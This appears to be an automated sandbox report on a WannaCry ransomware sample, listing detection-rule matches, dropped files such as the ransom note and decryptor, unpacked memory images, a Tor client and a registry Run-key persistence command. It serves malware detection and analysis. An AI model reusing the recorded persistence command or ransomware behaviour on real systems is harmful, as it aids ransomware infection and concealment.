                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 2N2jefqo8e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 2N2jefqo8e.exe, type: SAMPLEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 29.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 38.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 50.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 50.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 29.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 38.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\140021675181576.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00411CF025_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040B0C025_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A15025_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A9D025_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0041018025_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040B3C025_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040FBC025_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0041046025_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040ADC025_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A61025_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040DF3025_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F8025_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040FF9025_2_0040FF90
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040B0C029_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040A15029_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040A9D029_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0041018029_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040B3C029_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040FBC029_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0041046029_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00411CF029_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040ADC029_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040A61029_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040DF3029_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00406F8029_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040FF9029_2_0040FF90
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00406F8038_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040B0C038_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040A15038_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040A9D038_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0041018038_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040FBC038_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040B3C038_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0041046038_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00411CF038_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040ADC038_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040A61038_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040DF3038_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040FF9038_2_0040FF90
                  Source: 2N2jefqo8e.exeStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: taskdl.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1612265367.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1600606319.00000000001F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1634829824.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1651673511.0000000000A53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2865447420.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2867204725.0000000000A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.1600525607.0000000002538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: 2N2jefqo8e.exe, 00000000.00000003.2953385733.0000000000A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLODCTR.EXEj% vs 2N2jefqo8e.exe
                  Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libevent-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: ssleay32.dll.25.drStatic PE information: Number of sections : 18 > 10
                  Source: libeay32.dll.25.drStatic PE information: Number of sections : 18 > 10
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libssp-0.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: 2N2jefqo8e.exeVirustotal: Detection: 92%
                  Source: 2N2jefqo8e.exeReversingLabs: Detection: 95%
                  Source: 2N2jefqo8e.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\icacls.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\Desktop\taskse.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_37-120
                  Source: C:\Users\user\Desktop\taskdl.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_7-217
                  Source: unknownProcess created: C:\Users\user\Desktop\2N2jefqo8e.exe C:\Users\user\Desktop\2N2jefqo8e.exe
